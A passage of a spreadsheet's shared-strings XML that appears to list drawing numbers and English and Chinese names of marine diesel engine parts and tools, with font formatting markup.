  </si>
  <si>
    <t>DAAD017420</t>
  </si>
  <si>
    <t>DAAD017328</t>
  </si>
  <si>
    <t>DAAD017254</t>
  </si>
  <si>
    <t>107.013.836</t>
  </si>
  <si>
    <t>107.223.325</t>
  </si>
  <si>
    <t>107.389.169</t>
  </si>
  <si>
    <t>107.389.175</t>
  </si>
  <si>
    <t>107.389.173</t>
  </si>
  <si>
    <t>107.223.430</t>
  </si>
  <si>
    <t>107.223.361</t>
  </si>
  <si>
    <t>DAAD050933</t>
  </si>
  <si>
    <t>DAAD050932</t>
  </si>
  <si>
    <t>107.406.458</t>
  </si>
  <si>
    <t>107.354.451</t>
  </si>
  <si>
    <t>107.324.806</t>
  </si>
  <si>
    <t>107.324.807</t>
  </si>
  <si>
    <t>DAAD018122</t>
  </si>
  <si>
    <t>107.271.924</t>
  </si>
  <si>
    <t>107.273.119</t>
  </si>
  <si>
    <t>107.429.480</t>
  </si>
  <si>
    <t>DAAD017291</t>
  </si>
  <si>
    <t>107.223.895</t>
  </si>
  <si>
    <t>DAAD025024</t>
  </si>
  <si>
    <t>107.383.666</t>
  </si>
  <si>
    <t>DAAD026772</t>
  </si>
  <si>
    <t>DAAD017050</t>
  </si>
  <si>
    <t>107.093.963</t>
  </si>
  <si>
    <t>DAAD017020</t>
  </si>
  <si>
    <t>DAAD016027</t>
  </si>
  <si>
    <t>W4890014-200</t>
  </si>
  <si>
    <t>107.420.688</t>
  </si>
  <si>
    <t>107.422.173</t>
  </si>
  <si>
    <t>DAAD005525</t>
  </si>
  <si>
    <t>107.376.678</t>
  </si>
  <si>
    <t>107.246.313</t>
  </si>
  <si>
    <t>107.246.048</t>
  </si>
  <si>
    <t>107.246.077</t>
  </si>
  <si>
    <t>107.246.052</t>
  </si>
  <si>
    <t>DAAD016365</t>
  </si>
  <si>
    <t>107.433.085</t>
  </si>
  <si>
    <t>DAAD016690</t>
  </si>
  <si>
    <t>DAAD016403</t>
  </si>
  <si>
    <t>107.246.082</t>
  </si>
  <si>
    <t>107.144.369</t>
  </si>
  <si>
    <t>107.246.090</t>
  </si>
  <si>
    <t>DAAD016468</t>
  </si>
  <si>
    <t>107.246.303</t>
  </si>
  <si>
    <t>107.246.285</t>
  </si>
  <si>
    <t>107.246.286</t>
  </si>
  <si>
    <t>DAAD018113</t>
  </si>
  <si>
    <t>ENGINE LONGITUDINAL SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTION CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING RING CYLINDER LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING HUSK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING TENSIONER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAST SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING GEAR CYCLO TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DETENT PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MUSHROOM KNOB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing Cover Crank Pin Material Order</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DENIS INTERFACE SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL/AUXILIARY SYSTEMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFUSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HINGED COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING PACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM BOTTOM PLATE HANDRAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW COUPLING INTERNAL THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSERACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TENSION LOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE OVAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOLENOID FLOAT SWITCH UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CURVED INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELEMENT HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSION MEASURING SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOSTAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVELLING UP THE BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TREDO JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER CHAIN HOIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON HEAD SCREW DRIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL HEXAGON SOCKET SCREW KEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SINGLE HOOK DIN 15401</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORE GAUGE WITH CASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEAR RIDGE GRINDING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOULDER STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOVO-TECH-CLAMPING LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTLE NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GROOVED BALL BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERHAULING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RESET DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUGGING WRENCH RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT FERRULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BACK FERRULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDUCTIVE SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL STRAINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIGHTING ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPLOSION PROOF LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GALND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX. HEAD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEDGE WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXGON NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>START UNIT FOR SOSP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulation of T/C Techometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>b</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>l</t>
  </si>
  <si>
    <t>i</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>g</t>
  </si>
  <si>
    <t>f</t>
  </si>
  <si>
    <t>-</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4810024</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>eR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>R4</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>aR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4810008.200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W1-4WC022.200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4820004</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD012081</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>c</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>f</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>j</t>
  </si>
  <si>
    <t>bR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>jR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ad</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>k</t>
  </si>
  <si>
    <t>iR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.324.101</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>d</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>b</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>a</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>bR2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AR1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4880022-001</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD043033</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.317.196</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.317.197</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.336.033</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.223.417</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4890028-200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090049-200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4890028-002</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4890028-003</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4890050-200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>015.151.036.321</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>015.500.820.500</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>015.201.011.710</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4-0WA004</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W4890045-200</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.395.327</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.348.970</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.402.855</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ar1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R3</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R1</t>
  </si>
  <si>
    <t>DAAD051251</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5060014</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD027932</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD010098</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.387.381</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD013199</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD010579</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD029496</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD028240</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD018881</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD007498</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD019529</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD902414</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD041358</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD019580</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAW013287</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.424.214</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.297.781</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD008955</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD017993</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD007885</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.369.255</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.373.746</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090169</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090187</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cr3</t>
  </si>
  <si>
    <t>aR2</t>
  </si>
  <si>
    <t>-</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.315.252</t>
    <phoneticPr fontId="6" type="noConversion"/>
  </si>
  <si>
    <t>a</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD018675</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ar5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070439</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8480071</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8270461</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070405</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>b</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>c</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070256</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070420</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070340</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070426</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070437</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070445</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070446</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5070447</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD046489</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080189</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>A</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8280856</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080146</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080148</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WW5080178</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080179</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080181</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080133</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080137</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080147</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080151</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAT003385</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080149</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080145</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAAD042288</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080136</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.324.103.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5080167</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W7-2WA012</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8290166</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090167a</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8290056</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W8290094</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090070</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090049</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>W5090177</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧钢丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板金件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支撑布置图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气总管展开图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝绳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锐边角钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管夹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽球轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
      </rPr>
      <t>衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料和试验规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
